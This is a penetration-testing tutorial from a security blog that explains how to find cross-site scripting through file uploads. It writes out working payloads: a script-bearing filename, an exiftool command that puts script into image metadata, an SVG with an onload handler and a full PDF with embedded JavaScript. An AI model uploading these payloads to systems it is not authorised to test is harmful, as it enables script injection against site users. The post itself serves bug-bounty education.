Close Menu
    What's Hot

    Why GRC Services Are Vital for Business Growth and Compliance in 2025

    July 1, 2025

    Ultimate Guide to Attack Surface Scanning

    April 10, 2025

    Recent Trends in Zero Trust Architecture

    March 3, 2025
    Facebook X (Twitter) Instagram LinkedIn WhatsApp
    HITH Blog – HackerinthehouseHITH Blog – Hackerinthehouse
    • Bug Bounty

      A Beginner’s guide to Active Directory Penetration Testing

      June 21, 2023

      Building an XSS Scanner with Python

      February 27, 2023

      Journey to Website Security: Uncovering Hyperlink Injection Dangers

      February 24, 2023

      File Upload XSS | Find XSS in a different way while doing Bug bounty and Pentesting

      January 13, 2023

      How To Find DOM-based XSS Vulnerability

      December 27, 2022
    • Pen Testing

      Privileged Escalation: How Hackers Exploit Permissions to Compromise Your Systems

      March 5, 2024

      The Ultimate Guide to Vulnerability Scanning

      December 13, 2023

      Top 10 Tools for Real World Red Teaming

      November 18, 2023

      Locking Down OAuth 2.0: Critical Steps to Protect User Accounts and Data

      November 10, 2023

      Detailed guide on Password Transmutations

      April 29, 2023
    • Cyber Security

      Why GRC Services Are Vital for Business Growth and Compliance in 2025

      July 1, 2025

      Ultimate Guide to Attack Surface Scanning

      April 10, 2025

      Recent Trends in Zero Trust Architecture

      March 3, 2025

      Modern Defensive Cybersecurity Services

      December 29, 2024

      A Comprehensive Guide on Cyber Security Services VS Cyber Security Products

      June 14, 2024
    • Services
    • Product
      • Certifications
    • More
      1. Ethical Hacking
      2. Kali Linux
      3. Write Ups
      4. CTF
      5. Blockchain
      6. Machine Learning
      7. Computer Science
      8. View All

      Journey to Website Security: Uncovering Hyperlink Injection Dangers

      February 24, 2023

      Pentest/VAPT RoE and Best Practices

      February 3, 2023

      Emoji Deploy Attack Chain

      January 24, 2023

      Introduction to Information Security

      January 11, 2023

      Cyber Security Roadmap (Part-2)

      October 25, 2022

      How to install waybacksurls in kali linux (2022)

      September 23, 2022

      How To Find Hidden Parameters

      November 12, 2022

      Top 10 Subdomain Takeover Reports

      November 6, 2022

      Pause DeSync Attack :

      November 3, 2022

      Bypassing OTP Verification Methods

      October 31, 2022

      Tryhackme Vulnversity walkthrough

      September 26, 2022

      Why GRC Services Are Vital for Business Growth and Compliance in 2025

      July 1, 2025

      Ultimate Guide to Attack Surface Scanning

      April 10, 2025

      Recent Trends in Zero Trust Architecture

      March 3, 2025

      Modern Defensive Cybersecurity Services

      December 29, 2024

      A Peek into Facial Recognition Technology

      August 21, 2023

      How Data Scientists and Machine Learning Engineers Differs

      November 8, 2022

      Artificial Neural Networks with ML

      November 4, 2022

      INTRODUCTION TO MACHINE LEARNING

      October 20, 2022

      Robotic Process Automation: The Key to Effortless Efficiency

      September 18, 2024

      BCI: Merging Minds With Machines

      August 18, 2023

      Is Quantum Computing the future of Computing?

      August 16, 2023

      Why GRC Services Are Vital for Business Growth and Compliance in 2025

      July 1, 2025

      Ultimate Guide to Attack Surface Scanning

      April 10, 2025

      Recent Trends in Zero Trust Architecture

      March 3, 2025

      Modern Defensive Cybersecurity Services

      December 29, 2024
    HITH Blog – HackerinthehouseHITH Blog – Hackerinthehouse
    Home»Bug Bounty»File Upload XSS | Find XSS in a different way while doing Bug bounty and Pentesting
    Bug Bounty

    File Upload XSS | Find XSS in a different way while doing Bug bounty and Pentesting

    TheToySecBy TheToySecJanuary 13, 2023Updated:March 10, 2023No Comments5 Mins Read
    Share Facebook Twitter Pinterest LinkedIn Tumblr Reddit Telegram Email
    Share
    Facebook Twitter LinkedIn Pinterest Email

    Hey guys, this is TheToySec, back again with another Post. In this post we will discuss about File uploading XSS and how can we find XSS by just uploading a file while doing bug bounty as well as penetration testing. So without further delay lets start.

     

    So before talking about File upload XSS, lets understand What is XSS?

    XSS is stands for cross site scripting, which is a client side injection vulnerability allows an attacker to put and execute malicious codes in a website from the client side. For more information you can refer to What is XSS and XSS Cheat Sheet.

     

    File Upload XSS

    A file upload XSS is a serious chance to find cross-site scripting of a web application.
    As we know majority of the web applications allows clients or their users to upload files for numerous different purposes such as update profile picture, upload pictures, pdfs and other files in the comment etc. and these are a handy chance to find the loopholes on these features. So lets see how to attack these entry points which allows files to upload there, for the purpose of finding XSS.
    There are different types of techniques to check file upload XSS vulnerabilities.
    Find XSS using File Name
    Well, the filename always reflects on the web page when you upload any file, so you can change the filename with XSS payload and try to upload it on the web application. It may happen that XSS can be triggered there. For an example the file name can be “><img src=x onerror=prompt(“XSS”)>.jpg
    If you’re getting any error while creating a file in windows then try in Kali Linux and hopefully no error will be there.
    Find XSS using Meta Data
    So you might be wondering what is this Meta Data?
    Well, Meta Data is simply provide the information of the other data which is attached with the same file.
    Also you can say it is the data of data.
    Now lets create a Meta Data for XSS using Exif tool in Kali Linux.
    Lets check any file now:
    exiftool hello.jpg

    Type the following command for XSS using Exif tool :

    exiftool -Artist='"><script>alert(1)</script>'hello.jpg

     

    Lets confirm the the payload is embedded in the Meta Data or not by following command again:

    exiftool hello.jpg

    In this pic we can confirm the payload is successfully embedded. Well in my case I created a random image file named hello.jpg, you can create any name and embed any payload.

     

    Find XSS by uploading SVG file

    If the web application allows to uploading SVG file extension, which is also an image type, then we can simply try out to embed the XSS payload through SVG file.

    Here’s how we can Make a SVG file and Embed the payload for XSS

    Copy and paste the following code:

    <?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload="alert(1)"

    Now save it as a SVG file extension e.g. XSS.svg and upload it in that web application where SVG file is allowed, If there is no proper sanitizations SVG files then hopefully you’ll get a XSS!

     

    Find XSS by uploading PDF

    If there is a feature to upload the PDF File, then we can simply try out to embed the XSS payload through PDF file.

    Here’s how we can Make a PDF file and Embed the payload for XSS.

    Copy and paste the following code:

    %PDF-1.3
    % 
    1 0 obj
    <</Pages 2 0 R /Type /Catalog>>
    endobj
    2 0 obj
    <</Count 1 /Kids [3 0 R] /Type /Pages>>
    endobj
    3 0 obj
    <</AA
    <</O
    <</JS
    (
    try {
    app.alert\("Hacked by none"\)
    } catch \(e\) {
    app.alert\(e.message\);
    }
    ) 
    /S /JavaScript>>>>
    /Annots [] /Contents 4 0 R /MediaBox [0 0 612 792] /Parent 2 0 R
    /Resources
    <</Font <</F1 <</BaseFont /Helvetica /Subtype /Type1 /Type /Font>>>>>>
    /Type /Page>>
    endobj
    4 0 obj
    <</Length 21>>
    stream
    
    BT
    /F1 24 Tf
    ET
    
    endstream
    endobj
    xref
    0 5
    0000000000 65535 f
    0000000015 00000 n
    0000000062 00000 n
    0000000117 00000 n
    0000000424 00000 n
    trailer
    
    <</Root 1 0 R /Size 5>>
    startxref
    493
    %%EOF
    
    

    Now save it as a PDF file extension e.g. poc-1.pdf and upload it in that web application where PDF file is allowed, If there is no proper sanitizations for PDF files then hopefully you’ll get a XSS!

     

    Disclaimer: Hackerinthehouse, it’s author and it’s affiliates won’t be responsible for any actions made by you. If you’ll do anything illegal by the help of this article then you might be caught and at that time do not use the name ToySec, ha ha ha 😂😂, Just Kidding. This article is published for security research and education purposes only. It is the end user’s responsibility to obey all applicable local, state and federal laws.

     

    If you really like this post then give your reaction and don’t forget to share with others. Till then we will meet again in another interesting topic.

    Follow me here: https://www.linkedin.com/in/soumyaranjanpradhan/

    Thank you for reading this article and have a nice stay there! 

    Author

    • TheToySec
      TheToySec

      View all posts

    bugbounty bugbountytips cross site scripting file-uploading-xss pentesting webapp pentesting xss
    Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
    Previous ArticleIntroduction to Information Security
    Next Article Information Security Policies
    TheToySec

    Related Posts

    Cyber Security

    A Comprehensive Guide to APT

    March 10, 2024
    Pen Testing

    Privileged Escalation: How Hackers Exploit Permissions to Compromise Your Systems

    March 5, 2024
    Pen Testing

    The Ultimate Guide to Vulnerability Scanning

    December 13, 2023
    Add A Comment
    Leave A Reply Cancel Reply

    Advertisement
    Top Posts

    How to install waybacksurls in kali linux (2022)

    September 23, 20222,585 Views

    File Upload XSS | Find XSS in a different way while doing Bug bounty and Pentesting

    January 13, 2023897 Views

    OSCP Cheat Sheet

    October 16, 2022852 Views
    Stay In Touch
    • Facebook
    • YouTube
    • TikTok
    • WhatsApp
    • Twitter
    • Instagram
    Latest Reviews

    Subscribe to Updates

    Get the latest tech news from FooBar about tech, design and biz.

    Advertisement
    X (Twitter) Instagram LinkedIn WhatsApp Telegram
    • About us
    • Contact Us
    • Privacy Policy
    • Terms
    © 2025 HITH Blog. Powered by Hackerinthehouse.

    Type above and press Enter to search. Press Esc to cancel.

    Ad Blocker Enabled!
    Ad Blocker Enabled!
    Our website is made possible by displaying online advertisements to our visitors. Please support us by disabling your Ad Blocker.